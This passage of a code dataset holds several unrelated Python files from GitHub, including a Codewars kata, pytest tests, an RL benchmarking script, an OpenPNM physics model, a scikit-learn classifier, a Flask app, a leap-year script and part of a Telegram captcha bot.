AIClassifierSetAdmin)\n","repo_name":"luckyjd/lms_edx","sub_path":"edx-ficus.3-3/apps/edx/venvs/edxapp/lib/python2.7/site-packages/openassessment/assessment/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":6145,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"41789326380","text":"# 100th Kata\n# You are given a message (text) that you choose to read in a mirror (weirdo). Return what you would see,\n# complete with the mirror frame. Example:\n#\n# 'Hello World'\n#\n# would give:\n#\n#\n# Words in your solution should be left-aligned.\n\n\ndef mirror(text):\n text = text.split()\n maxim = len(max(text, key=len)) + 4\n mirror = \"\"\n for x in text:\n mirror += \"* \" + x[::-1] + \" \" * (maxim - 4 - len(x)) + \" *\\n\"\n return \"*\" * maxim + \"\\n\" + mirror + \"*\" * maxim\n","repo_name":"scardenasb/codewars","sub_path":"python3/framed_reflection.py","file_name":"framed_reflection.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"74124330115","text":"\"\"\"Test utils_data.\"\"\"\n\nimport tempfile\nfrom pathlib import Path\n\nimport pandas as pd\n\nfrom dash_charts import utils_data\n\n\ndef test_enable_verbose_pandas():\n \"\"\"Test enable_verbose_pandas.\"\"\"\n pd.set_option('display.max_columns', 0)\n\n utils_data.enable_verbose_pandas() # act\n\n pd.get_option('display.max_columns') is None\n\n\ndef test_validate():\n \"\"\"Test the validate function.\"\"\"\n schema = {\n 'x': {\n 'items': [{'type': ['integer', 'float']}, {'type': ['integer', 'float']}],\n 'required': True,\n 'type': 'list',\n },\n 'y': {\n 'items': [{'type': ['integer', 'float']}, {'type': ['integer', 'float']}],\n 'required': False,\n 'type': 'list',\n },\n }\n pass_doc_1 = {'x': [3, -4.0], 'y': [1e-6, 1e6]}\n pass_doc_2 = {'x': [-1e6, 1e6]}\n fail_doc_1 = {'x': [1, 2, 3]}\n\n fail_result = {'x': ['length of list should be 2, it is 3']} # act\n\n assert utils_data.validate(pass_doc_1, schema) == {}\n assert utils_data.validate(pass_doc_2, schema) == {}\n assert utils_data.validate(fail_doc_1, schema) == fail_result\n\n\ndef test_json_dumps_compact():\n \"\"\"Test json_dumps_compact.\"\"\"\n result = utils_data.json_dumps_compact({'A': ['A1', 'A2', 'A3'], 'B': {'C': ['A']}})\n\n assert result == \"\"\"{\n \\\"A\\\": [\\\"A1\\\",\\\"A2\\\",\\\"A3\\\"],\n \\\"B\\\": {\n \\\"C\\\": [\n \\\"A\\\"\n ]\n }\n}\"\"\"\n\n\ndef test_write_pretty_json():\n \"\"\"Test write_pretty_json.\"\"\"\n with tempfile.TemporaryDirectory() as tmp_dir:\n json_path = Path(tmp_dir) / 'tmp.json'\n utils_data.write_pretty_json(json_path, {'A': [1, 2, 3], 'B': 2})\n\n result = json_path.read_text()\n\n assert result == \"\"\"{\n \\\"A\\\": [\n 1,\n 2,\n 3\n ],\n \\\"B\\\": 2\n}\"\"\"\n\n\ndef test_write_csv():\n \"\"\"Test write_csv.\"\"\"\n with tempfile.TemporaryDirectory() as tmp_dir:\n csv_path = Path(tmp_dir) / 'tmp.json'\n utils_data.write_csv(csv_path, [['header 1', 'headder 2'], ['row 1', 'a'], ['row 2', 'b']])\n\n result = csv_path.read_text()\n\n assert result == 'header 1,headder 2\\nrow 1,a\\nrow 2,b\\n'\n\n\ndef test_get_unix():\n \"\"\"Test get_unix.\"\"\"\n result = utils_data.get_unix('31Dec1999', '%d%b%Y')\n\n assert result == 946616400.0\n\n\ndef test_format_unix():\n \"\"\"Test format_unix.\"\"\"\n result = utils_data.format_unix(946616400, '%d%b%Y')\n\n assert result == '31Dec1999'\n\n\ndef test_uniq_table_id():\n \"\"\"Test uniq_table_id.\"\"\"\n result = utils_data.uniq_table_id()\n\n assert result.startswith('U')\n assert len(result) == 20\n\n\ndef test_list_sql_tables():\n \"\"\"Test list_sql_tables.\"\"\"\n with tempfile.TemporaryDirectory() as tmp_dir:\n db_path = Path(tmp_dir) / 'tmp.db'\n with utils_data.SQLConnection(db_path) as conn:\n # Create EVENTS table\n cursor = conn.cursor()\n cursor.execute(\"\"\"CREATE TABLE EVENTS (\n id INT PRIMARY KEY NOT NULL,\n label TEXT NOT NULL\n );\"\"\")\n cursor.execute(\"\"\"CREATE TABLE MAIN (\n id INT PRIMARY KEY NOT NULL,\n value INT NOT NULL\n );\"\"\")\n conn.commit()\n\n result = utils_data.list_sql_tables(db_path)\n\n assert result == ['EVENTS', 'MAIN']\n","repo_name":"KyleKing/dash_charts","sub_path":"tests/test_utils_data.py","file_name":"test_utils_data.py","file_ext":"py","file_size_in_byte":3318,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"61"}
+{"seq_id":"17909306052","text":"from bbrl.workspace import Workspace\nfrom bbrl_examples.models.envs import create_no_reset_env_agent\nimport numpy as np\nimport hydra\nfrom omegaconf import OmegaConf as oc\nfrom bbrl_examples.algos.cem.rliable_generation import rliable_report as rly\nfrom bbrl_examples.algos.cem.rliable_generation import JSON_Generator as json_gen\nfrom bbrl_examples.algos.cem.rliable_generation import rliable_helpers as h\nfrom bbrl_examples.algos.cem.complex_function.cem_actuel import create_CEM_agent\nfrom bbrl_examples.algos.cem.complex_function.constant import *\nfrom bbrl_examples.algos.cem.complex_function.algorithm_copy import *\nimport inspect\nfrom bbrl_examples.algos.cem.complex_function import test_function\nfrom bbrl_examples.algos.cem.complex_function.algorithm_copy import *\n\nimport copy\n\nls_algos = [CEM, CEMi, CEM_plus_CEMi]\n\ndef rename(newname):\n\tdef decorator(f):\n\t\tf.__name__ = newname\n\t\treturn f\n\treturn decorator\n\ndef make_jsons_for_all_GYM_env(nb_runs,lst_GYM_configs):\n\t\n\tls_envs = []\n\tlst_parameter_dict = []\n\tfor c in lst_GYM_configs:\n\t\t\n\t\tcfg = oc.load(\"./configs/\"+c)\n\n\t\teval_env_agent = create_no_reset_env_agent(cfg)\n\t\teval_agent = create_CEM_agent(cfg, eval_env_agent)\n\t\t\n\n\t\tcentroid = torch.nn.utils.parameters_to_vector(eval_agent.parameters())\n\t\t\n\t\t# -------------------------------------------------------------------------------------\n\t\t# A modifier : c -> cfg.gym_env.env_name\n\t\t@rename(c)\n\t\tdef score_function(w,eval_agent=eval_agent):\n\t\t\tworkspace = Workspace()\n\t\t\ttorch.nn.utils.vector_to_parameters(w, eval_agent.parameters())\n\t\t\teval_agent(workspace, t=0, stop_variable=\"env/done\")\n\t\t\trewards = workspace[\"env/cumulated_reward\"][-1]\n\t\t\tmean_reward = rewards.mean()\n\n\t\t\treturn -mean_reward\n\t\t\n\t\t\n\t\tconf = cfg.algorithm\n\t\t\n\t\tparameter_dict = {'seuil_convergence': conf.seuil_convergence, 'delta_convergence': conf.delta_convergence,'centroid': torch.FloatTensor(\n\t\tcentroid), 'seed': conf.seed, 'sigma': conf.sigma, 'noise_multiplier': conf.noise_multiplier, 'max_epochs': conf.max_epochs, 'pop_size': conf.pop_size, 'elites_nb': conf.elites_nb}\n\n\t\tls_envs.append(score_function)\n\t\tlst_parameter_dict.append(parameter_dict)\n\t\n\t\n\tjson = json_gen.JSON_Generator(\n\t\tls_envs, ls_algos, nb_runs, lst_parameter_dict)\n\t\t\n\tjson.generate_jsons()\n\n# make_jsons_for_all_GYM_env(4, [\"cem_cartpole.yaml\",\"cem_acrobot.yaml\",\"cem_mountaincar.yaml\",\"cem_pendulum.yaml\"])\n\n\ndef get_min_maxs(ls_algos, folder_json):\n\t\"\"\"\n\t# Input\n\t\tliste des algorithmes utilises\n\t\tfolder des fichiers jsons\n\n\t# OUtput\n\t\t2 dicts avec les mins e t les maxs respectifs des differents algos dans folder_JSON\n\t\"\"\"\n\tls_algos = [algo.__name__ for algo in ls_algos]\n\tdict_json = [h.load_json(alg, folder_json) for alg in ls_algos]\n\n\tls_env = list(dict_json[0].keys())\n\n\tdict_mini = {}\n\tdict_maxi = {}\n\n\tfor env in ls_env:\n\t\tls_env_vals = []\n\t\tfor dict in dict_json:\n\t\t\tls = np.asarray(dict[env])\n\t\t\tls_env_vals.append(ls)\n\t\tls_env_vals = np.asarray(ls_env_vals).flatten()\n\t\tdict_mini[env] = np.min(ls_env_vals)\n\t\tdict_maxi[env] = np.max(ls_env_vals)\n\treturn dict_mini, dict_maxi\n\ndef make_rliable_analysis():\n\tls_algos_names = [algo.__name__ for algo in ls_algos]\n\tmins, maxs = get_min_maxs(ls_algos, './FolderJson')\n\tanalyzer = rly.rliable_Analyzer(ls_algos_names, './FolderJson', mins, maxs)\n\tanalyzer.plot_sample_efficiency_curve()\n\tanalyzer.plot_performance_profiles()\n\tanalyzer.plot_aggregate_metrics()\n\tls_pairs = [ ('CEM','CEMi') , ('CEM','CEM_plus_CEMi'), ('CEMi','CEM_plus_CEMi')]\n\tanalyzer.plot_probability_improvement(ls_pairs)\n\nmake_rliable_analysis()","repo_name":"srsrb/Improved_CrossEntropyMethod","sub_path":"src/complex_function/test_rliable_on_GYM.py","file_name":"test_rliable_on_GYM.py","file_ext":"py","file_size_in_byte":3544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"14215497641","text":"import matplotlib.pyplot as plt\n\nfrom src.single_tree.development_tree_reader import read_all_trees\nfrom src.single_tree.development_tree_utils import prepare_trees\nfrom src.single_tree.global_params import GlobalParams\nfrom src.view.draw_compared_trees import TreeDrawSettings, TreeDrawer, reduced_node_caption_1, double_node_caption_1, \\\n load_font, FONT_PATH, node_dist_caption_2\n\nmax_level = 10\nparam_a = 0.5\nis_reducing = False\nglobal_params = GlobalParams(max_level=max_level, param_a=param_a)\n\ndraw_settings = TreeDrawSettings(color_left=0xFF285EDD, color_right=0xFFFC7074,\n color_eq=0xFFE8E4DE, color_ineq=0xFFE8E4DE,\n get_node_caption_1=double_node_caption_1,\n get_node_caption_2=node_dist_caption_2,\n font=load_font(FONT_PATH, 10),\n legend_font=load_font(FONT_PATH, 20),\n width=2000, height=720)\ntree_drawer = TreeDrawer(draw_settings, global_params)\n\n# read and prepare trees: reduce if necessary, precalculate some parameters\n# notice: file names must be \"Genus_specie_type.xtg\", and it will be shown as \"Genus specie\"\ntrees = read_all_trees(pattern=\"test/test_input/sofa/test_reduce*.xtg\", is_test_nodes=True, max_level=max_level)\n#trees = read_all_trees(pattern=\"test/test_input/paper_m/M2_*.xtg\", is_test_nodes=True)\n#trees = read_all_trees(pattern=\"test/test_input/test_reduce*.xtg\", is_test_nodes=True)\ntrees = sorted(list(trees), key=lambda x: x.name)\nprepare_trees(trees, max_level, is_reducing=is_reducing, use_min_common_depth=False, use_flipping=False)\n\n# get N*(N-1) tree pairs, superimpose and draw\nfor i in range(0, len(trees)):\n for j in range(i + 1, len(trees)):\n im = tree_drawer.draw_tree(trees[i], trees[j], \"\")\n plt.imshow(im)\n plt.show()\n","repo_name":"npakudin/embrionic_tree","sub_path":"src/draw_test_trees.py","file_name":"draw_test_trees.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"41637758458","text":"r\"\"\"\nPore-scale models for calculating the advective-diffusive conductance of\nconduits.\n\"\"\"\nimport numpy as _np\n\n__all__ = [\"ad_dif\"]\n\n\ndef ad_dif(target,\n pore_pressure='pore.pressure',\n conduit_lengths='throat.conduit_lengths',\n throat_hydraulic_conductance='throat.hydraulic_conductance',\n throat_diffusive_conductance='throat.diffusive_conductance',\n s_scheme='powerlaw'):\n r\"\"\"\n Calculates the advective-diffusive conductance of conduits in network.\n\n A conduit is defined as ( 1/2 pore - full throat - 1/2 pore ). See the\n notes section.\n\n Parameters\n ----------\n target : GenericPhysics\n The Physics object which this model is associated with. This\n controls the length of the calculated array, and also provides\n access to other necessary properties.\n conduit_lengths : str\n Dictionary key of the conduit length values\n pore_pressure : str\n Dictionary key of the pore pressure values\n throat_hydraulic_conductance : str\n Dictionary key of the throat hydraulic conductance values\n throat_diffusive_conductance : str\n Dictionary key of the throat diffusive conductance values\n s_scheme : str\n Name of the space discretization scheme to use\n\n Returns\n -------\n g : ndarray\n Array containing advective-diffusive conductance values for\n conduits in the geometry attached to the given physics object.\n\n Notes\n -----\n This function requires that all the necessary phase properties already\n be calculated.\n\n This function calculates the specified property for the *entire*\n network then extracts the values for the appropriate throats at the\n end.\n\n This function assumes cylindrical throats with constant cross-section\n area. Corrections for different shapes and variable cross-section area\n can be imposed by passing the proper conduit_shape_factors argument\n when computig the diffusive and hydraulic conductances.\n\n shape_factor depends on the physics of the problem, i.e.\n diffusion-like processes and fluid flow need different shape factors.\n\n \"\"\"\n network = target.project.network\n throats = network.map_throats(throats=target.Ts, origin=target)\n phase = target.project.find_phase(target)\n cn = network['throat.conns'][throats]\n # Getting conduit lengths\n L1 = network[conduit_lengths + '.pore1'][throats]\n Lt = network[conduit_lengths + '.throat'][throats]\n L2 = network[conduit_lengths + '.pore2'][throats]\n # Preallocating g\n g1, g2, gt = _np.zeros((3, len(Lt)))\n # Setting g to inf when Li = 0 (ex. boundary pores)\n # INFO: This is needed since area could also be zero, which confuses NumPy\n m1, m2, mt = [Li != 0 for Li in [L1, L2, Lt]]\n g1[~m1] = g2[~m2] = gt[~mt] = _np.inf\n # Find g for half of pore 1, throat, and half of pore 2\n P = phase[pore_pressure]\n gh = phase[throat_hydraulic_conductance][throats]\n gd = phase[throat_diffusive_conductance][throats]\n if gd.size == throats.size:\n gd = _np.tile(gd, 2)\n # Special treatment when gd is not Nt by 1 (ex. mass partitioning)\n elif gd.size == 2 * throats.size:\n gd = gd.reshape(throats.size * 2, order='F')\n else:\n raise Exception(f\"Shape of {throat_diffusive_conductance} must either\"\n r\" be (Nt,1) or (Nt,2)\")\n\n Qij = -gh * _np.diff(P[cn], axis=1).squeeze()\n Qij = _np.append(Qij, -Qij)\n\n Peij = Qij / gd\n Peij[(Peij < 1e-10) & (Peij >= 0)] = 1e-10\n Peij[(Peij > -1e-10) & (Peij <= 0)] = -1e-10\n\n # Correct the flow rate\n Qij = Peij * gd\n\n if s_scheme == 'upwind':\n w = gd + _np.maximum(0, -Qij)\n elif s_scheme == 'hybrid':\n w = _np.maximum(0, _np.maximum(-Qij, gd - Qij / 2))\n elif s_scheme == 'powerlaw':\n w = gd * _np.maximum(0, (1 - 0.1 * _np.absolute(Peij))**5) + \\\n _np.maximum(0, -Qij)\n elif s_scheme == 'exponential':\n w = -Qij / (1 - _np.exp(Peij))\n else:\n raise Exception('Unrecognized discretization scheme: ' + s_scheme)\n w = w.reshape(throats.size, 2, order='F')\n return w\n","repo_name":"halotudio/openPNM-copy2","sub_path":"openpnm/models/physics/ad_dif_conductance.py","file_name":"ad_dif_conductance.py","file_ext":"py","file_size_in_byte":4153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"32479572630","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport sys\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom sklearn.metrics import classification_report, confusion_matrix, accuracy_score\nfrom sklearn.tree import export_graphviz\n\ndataset = pd.read_csv(r\"data_files\\FINAL_DATASET.csv\")\ntestset = pd.read_csv(r\"data_files\\KM4U.csv\")\n\ndataset.head()\nprint(dataset)\n\n#Data Preprocessing\nX_train = dataset.iloc[:, :-1].values\ny_train = dataset.iloc[:, -1].values\nX_test = testset.iloc[:, :-1].values\ny_test = testset.iloc[:, -1].values\nfeatures = ['Context','Acceptance','Accuracy']\n\n#train the model with the help of RandomForestClassifier class of sklearn\n#classifier = RandomForestClassifier(n_estimators = 100)\nclassifier = ExtraTreesClassifier(n_estimators=10, max_depth=None,min_samples_split=2, random_state=0) #Forests of extremely randomized trees\nclassifier.fit(X_train, y_train)\nclassifier_limited = classifier.estimators_[5]\n\n##To make a prediction\ny_pred = classifier.predict(X_test)\n#np.set_printoptions(threshold=sys.maxsize)\n#print(y_pred)\ny_pred = y_pred.tolist()\nprint(y_pred)\n\ncount_0 = 0\ncount_1 = 0\ncount_2 = 0\n\nfor num in y_pred:\n if num == 0:\n count_0 += 1\n elif num == 1:\n count_1 += 1\n elif num == 2:\n count_2 += 1\n\nprint(\"----Algorithm Classification Results----\")\nprint(\"Low Quality:\",count_0)\nprint(\"Medium Quality:\",count_1)\nprint(\"High Quality:\",count_2)\n\nexport_graphviz(classifier_limited,out_file='trees.dot',\n feature_names = features,\n rounded = True, proportion = False,\n precision = 4, filled = True)\nfrom subprocess import call\ncall(['dot', '-Tpng', 'trees.dot', '-o', 'images\\ rf_classify.png', '-Gdpi=600'])\nfrom IPython.display import Image\nImage(filename = 'images\\ rf_classify.png')","repo_name":"casporo/pythonfile","sub_path":".idea/CGKS Algorithm/rf_classify_final.py","file_name":"rf_classify_final.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"3997667014","text":"import json\nimport plotly\nimport pandas as pd\nimport joblib\nimport plotly.express as px\n\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.tokenize import word_tokenize\n\nfrom flask import Flask\nfrom flask import render_template, request, jsonify\nfrom plotly.graph_objs import Pie, Bar\nfrom sqlalchemy import create_engine\n\n\napp = Flask(__name__)\n\ndef tokenize(text):\n tokens = word_tokenize(text)\n lemmatizer = WordNetLemmatizer()\n\n clean_tokens = []\n for tok in tokens:\n clean_tok = lemmatizer.lemmatize(tok).lower().strip()\n clean_tokens.append(clean_tok)\n\n return clean_tokens\n\n# load data\nengine = create_engine('sqlite:///../data/DisasterResponse.db')\ndf = pd.read_sql_table('messages_categories', engine)\n\n# load model\nmodel = joblib.load(\"../models/classifier.pkl\")\n\n\n# index webpage displays cool visuals and receives user input text for model\n@app.route('/')\n@app.route('/index')\ndef index():\n \n genre_counts = df['genre'].value_counts()\n fig = px.pie(genre_counts, names=genre_counts.index, values=genre_counts.values, title='Genre Distribution')\n\n # Create the pie chart\n fig = px.pie(genre_counts, names=genre_counts.index, values=genre_counts.values, title='Genre Distribution')\n\n # Extract the necessary information\n genre_labels = genre_counts.index.tolist()\n genre_percentages = [float(value) for value in genre_counts.values / genre_counts.sum() * 100]\n\n category_columns = ['related', 'request', 'offer', 'aid_related', 'medical_help', 'medical_products',\n 'search_and_rescue', 'security', 'military', 'child_alone', 'water', 'food', \n 'shelter', 'clothing', 'money', 'missing_people', 'refugees', 'death',\n 'other_aid', 'infrastructure_related', 'transport', 'buildings',\n 'electricity', 'tools', 'hospitals', 'shops', 'aid_centers',\n 'other_infrastructure', 'weather_related', 'floods', 'storm',\n 'fire', 'earthquake', 'cold', 'other_weather', 'direct_report']\n \n category_counts = df[category_columns].sum().sort_values(ascending=False)\n category_names = list(category_counts.index)\n\n\n # create visuals\n # TODO: Below is an example - modify to create your own visuals\n graphs = [\n {\n 'data': [\n Pie(\n labels=genre_counts.index,\n values=genre_counts.values\n )\n ],\n 'layout': {\n 'title': 'Genre Distribution'\n }\n },\n {\n 'data': [\n Bar(\n x=category_names,\n y=category_counts\n )\n ],\n 'layout': {\n 'title': 'Category Distribution',\n 'yaxis': {\n 'title': \"Number of Messages\"\n },\n 'xaxis': {\n 'title': \"Categories\"\n }\n }\n }\n ]\n \n # encode plotly graphs in JSON\n ids = [\"graph-{}\".format(i) for i, _ in enumerate(graphs)]\n graphJSON = json.dumps(graphs, cls=plotly.utils.PlotlyJSONEncoder)\n \n # render web page with plotly graphs\n return render_template('master.html', ids=ids, graphJSON=graphJSON)\n\n\n# web page that handles user query and displays model results\n@app.route('/go')\ndef go():\n # save user input in query\n query = request.args.get('query', '') \n\n # use model to predict classification for query\n classification_labels = model.predict([query])[0]\n classification_results = dict(zip(df.columns[4:], classification_labels))\n\n # This will render the go.html Please see that file. \n return render_template(\n 'go.html',\n query=query,\n classification_result=classification_results\n )\n\n\ndef main():\n app.run(host='0.0.0.0', port=3000, debug=True)\n\n\nif __name__ == '__main__':\n main()","repo_name":"rafhsilv/disaster-response-pipeline","sub_path":"app/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"1983957223","text":"def leap_year(year):\r\n if year%400==0 and year%100==0:\r\n print(f\"{year} is a leap year\")\r\n return True\r\n elif year%4==0 and year%100!=0:\r\n print(f\"{year} is a LEAP YEAR\")\r\n return True\r\n else:\r\n print(f\"{year} is not a LEAP YEAR\")\r\n return False\r\ndef month_in_year(year,month):\r\n month_days=[30,28,31,30,31,30,31,31,30,31,30,31]\r\n\r\n if leap_year(year) and month==2:\r\n month_days = 29\r\n print(f\"The Year {year} Has {month_days} Days In Month {month} \")\r\n else:\r\n print(f\"The Year {year} Has {month_days[month-1]} Days In Month {month} \")\r\n\r\nyear=int(input(\"Enter the year : \"))\r\nmonth=int(input(\"Enter the month in number : \"))\r\nmonth_in_year(year,month)\r\n\r\n\r\n\r\n\r\n","repo_name":"Navinulchemy/python-projects","sub_path":"leap year.py","file_name":"leap year.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"40194896251","text":"# !/usr/bin/env python3\nimport asyncio\nimport json\nimport threading\nimport logging, subprocess\nfrom time import time, sleep\n# from challenge import Challenge\nfrom pyrogram import (Client, Filters, Message, User, InlineKeyboardButton,\n InlineKeyboardMarkup, CallbackQuery, ChatPermissions)\nfrom pyrogram.errors import ChatAdminRequired, ChannelPrivate, ChannelInvalid\nfrom Timer import Timer\nimport re\n\n_app: Client = None\n_channel: str = None\n_start_message: str = None\n# _challenge_scheduler = sched.scheduler(time, sleep)\n_current_challenges = dict()\n_cch_lock = threading.Lock()\n_config = dict()\nlogging.basicConfig(level=logging.INFO)\n# 设置一下日志记录,能够在诸如 systemctl status captchabot 这样的地方获得详细输出。\n\n\ndef load_config():\n global _config\n with open(\"config.json\", encoding=\"utf-8\") as f:\n _config = json.load(f)\n\n\ndef save_config():\n with open(\"config.json\", \"w\") as f:\n json.dump(_config, f, indent=4)\n\n\ndef _update(app):\n @app.on_message(Filters.command(\"help\") & Filters.group)\n async def helping_cmd(client: Client, message: Message):\n _me: User = await client.get_me()\n logging.info(message.text)\n await message.reply(_config[\"*\"][\"msg_self_introduction\"])\n\n @app.on_message(Filters.command(\"ping\"))\n async def ping_command(client: Client, message: Message):\n await message.reply(\"poi~\")\n\n @app.on_message(Filters.command(\"start\") & Filters.private)\n async def start_command(client: Client, message: Message):\n await message.reply(_start_message)\n\n @app.on_callback_query()\n async def challenge_callback(client: Client,\n callback_query: CallbackQuery):\n query_data = str(callback_query.data)\n query_id = callback_query.id\n chat_id = callback_query.message.chat.id\n user_id = callback_query.from_user.id\n msg_id = callback_query.message.message_id\n chat_title = callback_query.message.chat.title\n user_name = callback_query.from_user.first_name\n group_config = _config.get(str(chat_id), _config[\"*\"])\n if query_data in [\"+\", \"-\"]:\n admins = await client.get_chat_members(chat_id,\n filter=\"administrators\")\n if not any([\n admin.user.id == user_id and\n (admin.status == \"creator\" or admin.can_restrict_members)\n for admin in admins\n ]):\n await client.answer_callback_query(\n query_id, group_config[\"msg_permission_denied\"])\n return\n\n ch_id = \"{chat}|{msg}\".format(chat=chat_id, msg=msg_id)\n _cch_lock.acquire()\n # target: int = None\n target, timeout_event = _current_challenges.get(\n ch_id, (None, None))\n if ch_id in _current_challenges:\n del _current_challenges[ch_id]\n _cch_lock.release()\n timeout_event.stop()\n\n if query_data == \"+\":\n try:\n await client.restrict_chat_member(\n chat_id,\n target,\n permissions=ChatPermissions(\n can_send_other_messages=True,\n can_send_messages=True,\n can_send_media_messages=True,\n can_add_web_page_previews=True,\n ))\n except ChatAdminRequired:\n await client.answer_callback_query(\n query_id, group_config[\"msg_bot_no_permission\"])\n return\n\n await client.edit_message_text(\n chat_id,\n msg_id,\n group_config[\"msg_approved\"].format(user=user_name),\n reply_markup=None,\n )\n _me: User = await client.get_me()\n try:\n await client.send_message(\n int(_channel),\n _config[\"msg_passed_admin\"].format(\n botid=str(_me.id),\n targetuser=str(target),\n groupid=str(chat_id),\n grouptitle=str(chat_title),\n ),\n parse_mode=\"Markdown\",\n )\n except Exception as e:\n logging.error(str(e))\n else:\n try:\n await client.kick_chat_member(chat_id, target)\n except ChatAdminRequired:\n await client.answer_callback_query(\n query_id, group_config[\"msg_bot_no_permission\"])\n return\n await client.edit_message_text(\n chat_id,\n msg_id,\n group_config[\"msg_refused\"].format(user=user_name),\n reply_markup=None,\n )\n _me: User = await client.get_me()\n try:\n await client.send_message(\n int(_channel),\n _config[\"msg_failed_admin\"].format(\n botid=str(_me.id),\n targetuser=str(target),\n groupid=str(chat_id),\n grouptitle=str(chat_title),\n ),\n parse_mode=\"Markdown\",\n )\n except Exception as e:\n logging.error(str(e))\n await client.answer_callback_query(query_id)\n return\n\n ch_id = \"{chat}|{msg}\".format(chat=chat_id, msg=msg_id)\n _cch_lock.acquire()\n target, timeout_event = _current_challenges.get(ch_id, (None, None))\n _cch_lock.release()\n if user_id != target:\n await client.answer_callback_query(\n query_id, group_config[\"msg_challenge_not_for_you\"])\n return None\n timeout_event.stop()\n try:\n await client.restrict_chat_member(\n chat_id,\n target,\n permissions=ChatPermissions(can_send_other_messages=True,\n can_send_messages=True,\n can_send_media_messages=True,\n can_add_web_page_previews=True,\n can_send_polls=True))\n except ChatAdminRequired:\n pass\n\n correct = \"no\" == query_data\n if correct:\n await client.edit_message_text(\n chat_id,\n msg_id,\n group_config[\"msg_challenge_passed\"],\n reply_markup=None)\n _me: User = await client.get_me()\n try:\n await client.send_message(\n int(_channel),\n _config[\"msg_passed_answer\"].format(\n botid=str(_me.id),\n targetuser=str(target),\n groupid=str(chat_id),\n grouptitle=str(chat_title),\n ),\n parse_mode=\"Markdown\",\n )\n except Exception as e:\n logging.error(str(e))\n else:\n await client.edit_message_text(\n chat_id,\n msg_id,\n group_config[\"msg_challenge_failed\"],\n reply_markup=None,\n )\n # await client.restrict_chat_member(chat_id, target)\n _me: User = await client.get_me()\n try:\n await client.send_message(\n int(_channel),\n _config[\"msg_failed_answer\"].format(\n botid=str(_me.id),\n targetuser=str(target),\n groupid=str(chat_id),\n grouptitle=str(chat_title),\n ),\n parse_mode=\"Markdown\",\n )\n except Exception as e:\n logging.error(str(e))\n if group_config[\"challenge_timeout_action\"] == \"ban\":\n await client.kick_chat_member(chat_id, user_id)\n elif group_config[\"challenge_timeout_action\"] == \"kick\":\n await client.kick_chat_member(chat_id, user_id)\n await client.unban_chat_member(chat_id, user_id)\n else:\n pass\n if group_config[\"delete_failed_challenge\"]:\n Timer(\n client.delete_messages(chat_id, msg_id),\n group_config[\"delete_failed_challenge_interval\"],\n )\n if group_config[\"delete_passed_challenge\"]:\n Timer(\n client.delete_messages(chat_id, msg_id),\n group_config[\"delete_passed_challenge_interval\"],\n )\n\n @app.on_message(Filters.new_chat_members)\n async def challenge_user(client: Client, message: Message):\n target = message.new_chat_members[0]\n if message.from_user.id != target.id:\n if target.is_self:\n group_config = _config.get(str(message.chat.id), _config[\"*\"])\n try:\n await client.send_message(\n message.chat.id, group_config[\"msg_self_introduction\"])\n _me: User = await client.get_me()\n try:\n await client.send_message(\n int(_channel),\n _config[\"msg_into_group\"].format(\n botid=str(_me.id),\n groupid=str(message.chat.id),\n grouptitle=str(message.chat.title),\n ),\n parse_mode=\"Markdown\",\n )\n except Exception as e:\n logging.error(str(e))\n except ChannelPrivate:\n return\n return\n try:\n await client.restrict_chat_member(\n chat_id=message.chat.id,\n user_id=target.id,\n permissions=ChatPermissions(can_send_other_messages=False,\n can_send_messages=False,\n can_send_media_messages=False,\n can_add_web_page_previews=False,\n can_send_polls=False))\n except ChatAdminRequired:\n return\n group_config = _config.get(str(message.chat.id), _config[\"*\"])\n\n def generate_challenge_button():\n choices = []\n answers = []\n answers.append(InlineKeyboardButton(\"我不是机器人\", callback_data=\"no\"))\n answers.append(InlineKeyboardButton(\"请把我踢了吧\", callback_data=\"yes\"))\n choices.append(answers)\n return choices + [[\n InlineKeyboardButton(group_config[\"msg_approve_manually\"],\n callback_data=b\"+\"),\n InlineKeyboardButton(group_config[\"msg_refuse_manually\"],\n callback_data=b\"-\"),\n ]]\n\n timeout = group_config[\"challenge_timeout\"]\n reply_message = await client.send_message(\n message.chat.id,\n group_config[\"msg_challenge\"].format(\n target=target.first_name,\n target_id=target.id,\n timeout=timeout,\n challenge=\n \"请证明你不是一个广告机器人。\\nPlease prove yourself is not a robot.\"),\n reply_to_message_id=message.message_id,\n reply_markup=InlineKeyboardMarkup(generate_challenge_button()),\n )\n _me: User = await client.get_me()\n chat_id = message.chat.id\n chat_title = message.chat.title\n target = message.from_user.id\n timeout_event = Timer(\n challenge_timeout(client, message.chat.id, message.from_user.id,\n reply_message.message_id),\n timeout=group_config[\"challenge_timeout\"],\n )\n _cch_lock.acquire()\n _current_challenges[\"{chat}|{msg}\".format(\n chat=message.chat.id,\n msg=reply_message.message_id)] = (message.from_user.id,\n timeout_event)\n _cch_lock.release()\n\n async def challenge_timeout(client: Client, chat_id, from_id, reply_id):\n global _current_challenges\n _me: User = await client.get_me()\n group_config = _config.get(str(chat_id), _config[\"*\"])\n\n _cch_lock.acquire()\n del _current_challenges[\"{chat}|{msg}\".format(chat=chat_id,\n msg=reply_id)]\n _cch_lock.release()\n\n # TODO try catch\n await client.edit_message_text(\n chat_id=chat_id,\n message_id=reply_id,\n 